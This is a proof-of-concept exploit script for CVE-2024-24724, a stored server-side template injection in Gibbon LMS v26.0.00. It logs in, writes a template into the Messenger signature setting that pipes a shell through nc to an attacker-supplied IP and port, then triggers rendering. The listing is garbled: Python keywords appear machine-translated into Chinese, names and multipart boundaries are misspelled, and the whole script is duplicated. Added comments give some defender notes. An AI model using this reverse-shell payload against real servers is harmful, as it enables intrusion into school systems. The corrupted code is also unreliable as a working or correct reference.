# Exploit Title: Gibbon LMS V26.0.00 - SSTI vulnerability
# Date: 21.01.2024
# Exploit Author: Secondx.io Research Team (Islam Rzayev, Fikrat Guliev, Ali Maharramli)
# Vendor Homepage: https://gibbonedu.org/
# Software Link: https://github.com/gibbonedu/core
# Version: V26.0.00
# Tested on: Ubuntu 22.0
# CVE: CVE-2024-24724
导入请求
导入
导入系统
# Stage 1 of the PoC: authenticate to the target with the supplied credentials
# and hand back the session cookie used by the later requests.
# NOTE(review): this listing is a machine-translated, garbled copy (keywords and
# several identifiers are not valid Python); the comments describe the intended
# flow for analysis purposes — the code is not runnable as shown.
def登录(target_host,target_port,电子邮件,密码):
url=f'http://{target_host} : {target_port}/login.php?timeout=true'
# Hand-built multipart body: fields address, method=default, username, password,
# gibbonSchoolYearID=025 and gibboni18nID=0002, separated by a fixed boundary.
标题={'content-type':'multipart/form-data;
边界=----------------------------------- 17447595731268836341556039466'}
数据=
f'-------------------------------------------- 17447595731268836341556039466 \ r \ ncontent-disposition:
form-data;
name=\'address\'\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'method\'\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'username\'\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'password\'\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'gibbonSchoolYearID\'\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'gibboni18nID\'\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n'
# The login POST is sent without following the redirect so the Set-Cookie and
# Location headers of the first response can be inspected directly.
r=requests.post(url,headers=标题,data=data,
ally_redirects=false)
# The Set-Cookie header is split on whitespace and element 4 is taken as the
# session cookie — this depends on the exact header layout of the target
# (presumably the cookie token in the observed response); fragile by design.
session_cookie=re.split(r'\ s+',r.headers ['set-cookie'])
# Success is inferred from a redirect to /index.php. There is no else branch:
# on any other response the function returns None, which the caller does not
# check before passing it on as the cookie.
如果session_cookie [4]不是没有,并且'/index.php'in
str(R.Headers ['location']):
打印('登录成功!')
返回session_cookie [4]
# Stage 2 of the PoC: as the authenticated user, save the Messenger settings
# with a template expression in the signature template field. The value is
# stored server-side; the expression ends in `|filter('system')`, which is the
# stored server-side template injection (SSTI) sink this CVE describes.
# The embedded OS command is parameterised by tainter_ip / taints_port.
# Defender notes: patching to a fixed release removes the sink; detection can
# key on POSTs to messengersettingsprocess.php whose signaturetemplate field
# contains template delimiters (`{{`, `}}`) or `|filter(`, and on a stored
# messenger signature template containing such syntax.
def rce(cookie,target_host,target_port,tainter_ip,taints_port):
URL=
F'http://{target_host} : {target_port}/modules/school%20Admin/messengersettingsprocess.php'
# The session cookie from login is sent as a plain Cookie header.
标题={'content-type':'multipart/form-data;
边界=--------------------------------- 671426466631840027692410521651',
'cookie': cookie}
# Multipart body: address, enableHomeScreenWidget=Y, signaturetemplate
# (the injected template), messageBcc (empty), pinnedMessagesOnHome=N.
数据=
f'------------------------------------- 67142646631840027692410521651 \ r \ ncontent-disposition:
form-data; name=\'地址\'\ r \ n \ r \ n/模块/学校
admin/messengertings.php \ r \ n -------------------------------------------------------------------------------------------------- 671426466631840027692410521651 \ r \ r \ ncontent-disposition:
form-data;
name=\'enableHomeScreenWidget\'\r\n\r\nY\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition:
form-data; name=\'signaturetemplate \'\ r \ n \ r \ n {{{{{[\'rm /tmp /f; mkfifo
/tmp/f; cat/tmp/f | sh -i 21 | nc {tacterer_ip} {tactioner_port}
/tmp/f']|filter('system')}}}}\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\'messageBcc\'\r\n\r\n\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\'pinnedMessagesOnHome\'\r\n\r\nN\r\n-----------------------------67142646631840027692410521651--\r\n'
# Redirects are not followed so the Location header of the save response can
# be inspected.
r=requests.post(url,headers=标题,data=data,
ally_redirects=false)
# A redirect containing 'Success0' is taken to mean the settings were saved;
# nothing is printed otherwise and no value is returned either way.
如果在str(R.Headers ['location']中的'Success0'):
打印(“有效载荷成功上传!”)
# Stage 3 of the PoC: request the Messenger settings page so the stored
# signature template is rendered, which is what evaluates the injected
# expression. Detection note: the page request itself is benign-looking; the
# indicator is the stored template content written in stage 2.
def触发器(cookie,target_host,target_port):
URL=
f'http://{target_host} : {target_port}/index.php?q=/modules/school%20Admin/messengersettings.phpreturn=success0'
标头={'cookie': cookie}
# The success message is printed before the GET is issued and regardless of
# the response, so it reports nothing about whether rendering happened.
打印(“ RCE成功!”)
r=requests.get(url,headers=headers,ally_redirects=false)
# Script entry point: expects exactly six positional arguments
# (target_host target_port attacker_ip attacker_port email password) and
# runs the three stages in order.
如果name=='__ -Main __':
如果Len(sys.argv)!=7:
print('USAGE: script.py target_host target_port
Attacker_ip Attacker_port电子邮件密码')
sys.exit(1)
# login may return None when its redirect check fails; that value is passed
# straight into the next two stages without being checked.
cookie=login(sys.argv [1],sys.argv [2],sys.argv [5],sys.argv [6])
RCE(cookie,sys.argv [1],sys.argv [2],sys.argv [3],sys.argv [4])
触发器(cookie,sys.argv [1],sys.argv [2])
# Date: 21.01.2024
# Exploit Author: Secondx.io Research Team (Islam Rzayev, Fikrat Guliev, Ali Maharramli)
# Vendor Homepage: https://gibbonedu.org/
# Software Link: https://github.com/gibbonedu/core
# Version: V26.0.00
# Tested on: Ubuntu 22.0
# CVE: CVE-2024-24724
导入请求
导入
导入系统
# Stage 1 of the PoC (second, verbatim copy of the definition earlier in this
# file; a later definition with the same name simply rebinds it): authenticate
# with the supplied credentials and return the session cookie.
# NOTE(review): this listing is a machine-translated, garbled copy (keywords and
# several identifiers are not valid Python); the comments describe the intended
# flow for analysis purposes — the code is not runnable as shown.
def登录(target_host,target_port,电子邮件,密码):
url=f'http://{target_host} : {target_port}/login.php?timeout=true'
# Hand-built multipart body: fields address, method=default, username, password,
# gibbonSchoolYearID=025 and gibboni18nID=0002, separated by a fixed boundary.
标题={'content-type':'multipart/form-data;
边界=----------------------------------- 17447595731268836341556039466'}
数据=
f'-------------------------------------------- 17447595731268836341556039466 \ r \ ncontent-disposition:
form-data;
name=\'address\'\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'method\'\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'username\'\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'password\'\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'gibbonSchoolYearID\'\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'gibboni18nID\'\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n'
# The login POST is sent without following the redirect so the Set-Cookie and
# Location headers of the first response can be inspected directly.
r=requests.post(url,headers=标题,data=data,
ally_redirects=false)
# The Set-Cookie header is split on whitespace and element 4 is taken as the
# session cookie — this depends on the exact header layout of the target
# (presumably the cookie token in the observed response); fragile by design.
session_cookie=re.split(r'\ s+',r.headers ['set-cookie'])
# Success is inferred from a redirect to /index.php. There is no else branch:
# on any other response the function returns None, which the caller does not
# check before passing it on as the cookie.
如果session_cookie [4]不是没有,并且'/index.php'in
str(R.Headers ['location']):
打印('登录成功!')
返回session_cookie [4]
# Stage 2 of the PoC (second, verbatim copy of the definition earlier in this
# file): as the authenticated user, save the Messenger settings with a template
# expression in the signature template field. The value is stored server-side;
# the expression ends in `|filter('system')`, which is the stored server-side
# template injection (SSTI) sink this CVE describes. The embedded OS command is
# parameterised by tainter_ip / taints_port.
# Defender notes: patching to a fixed release removes the sink; detection can
# key on POSTs to messengersettingsprocess.php whose signaturetemplate field
# contains template delimiters (`{{`, `}}`) or `|filter(`, and on a stored
# messenger signature template containing such syntax.
def rce(cookie,target_host,target_port,tainter_ip,taints_port):
URL=
F'http://{target_host} : {target_port}/modules/school%20Admin/messengersettingsprocess.php'
# The session cookie from login is sent as a plain Cookie header.
标题={'content-type':'multipart/form-data;
边界=--------------------------------- 671426466631840027692410521651',
'cookie': cookie}
# Multipart body: address, enableHomeScreenWidget=Y, signaturetemplate
# (the injected template), messageBcc (empty), pinnedMessagesOnHome=N.
数据=
f'------------------------------------- 67142646631840027692410521651 \ r \ ncontent-disposition:
form-data; name=\'地址\'\ r \ n \ r \ n/模块/学校
admin/messengertings.php \ r \ n -------------------------------------------------------------------------------------------------- 671426466631840027692410521651 \ r \ r \ ncontent-disposition:
form-data;
name=\'enableHomeScreenWidget\'\r\n\r\nY\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition:
form-data; name=\'signaturetemplate \'\ r \ n \ r \ n {{{{{[\'rm /tmp /f; mkfifo
/tmp/f; cat/tmp/f | sh -i 21 | nc {tacterer_ip} {tactioner_port}
/tmp/f']|filter('system')}}}}\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\'messageBcc\'\r\n\r\n\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\'pinnedMessagesOnHome\'\r\n\r\nN\r\n-----------------------------67142646631840027692410521651--\r\n'
# Redirects are not followed so the Location header of the save response can
# be inspected.
r=requests.post(url,headers=标题,data=data,
ally_redirects=false)
# A redirect containing 'Success0' is taken to mean the settings were saved;
# nothing is printed otherwise and no value is returned either way.
如果在str(R.Headers ['location']中的'Success0'):
打印(“有效载荷成功上传!”)
# Stage 3 of the PoC (second, verbatim copy of the definition earlier in this
# file): request the Messenger settings page so the stored signature template
# is rendered, which is what evaluates the injected expression. Detection note:
# the page request itself is benign-looking; the indicator is the stored
# template content written in stage 2.
def触发器(cookie,target_host,target_port):
URL=
f'http://{target_host} : {target_port}/index.php?q=/modules/school%20Admin/messengersettings.phpreturn=success0'
标头={'cookie': cookie}
# The success message is printed before the GET is issued and regardless of
# the response, so it reports nothing about whether rendering happened.
打印(“ RCE成功!”)
r=requests.get(url,headers=headers,ally_redirects=false)
# Script entry point (second, verbatim copy of the one earlier in this file):
# expects exactly six positional arguments (target_host target_port attacker_ip
# attacker_port email password) and runs the three stages in order.
如果name=='__ -Main __':
如果Len(sys.argv)!=7:
print('USAGE: script.py target_host target_port
Attacker_ip Attacker_port电子邮件密码')
sys.exit(1)
# login may return None when its redirect check fails; that value is passed
# straight into the next two stages without being checked.
cookie=login(sys.argv [1],sys.argv [2],sys.argv [5],sys.argv [6])
RCE(cookie,sys.argv [1],sys.argv [2],sys.argv [3],sys.argv [4])
触发器(cookie,sys.argv [1],sys.argv [2])